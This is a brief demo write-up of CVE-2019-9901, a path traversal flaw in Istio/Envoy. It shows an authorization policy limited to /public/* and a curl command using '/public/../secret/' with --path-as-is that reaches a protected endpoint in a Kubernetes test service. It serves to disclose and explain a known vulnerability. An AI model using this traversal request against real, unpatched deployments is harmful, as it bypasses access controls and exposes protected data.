CVE-2019-9901 - Istio/Envoy Path traversal

This scenario demos has been taken from https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md. Thanks to Erlend Oftedal

A simple project with a web server and deployed it on Kubernetes. The web application had two endpoints /public/ and /secret/. Added an authorization policy which tried to grant access to anything below /public/:

  rules:
  - services: ["backend.fishy.svc.cluster.local"]
    methods: ["GET"]
    paths: ["/public/*"]

Then used standard path traversal from curl:

curl -vvvv --path-as-is  "http://backend.fishy.svc.cluster.local:8081/public/../secret/"

And was able to reach /secret/.

Reference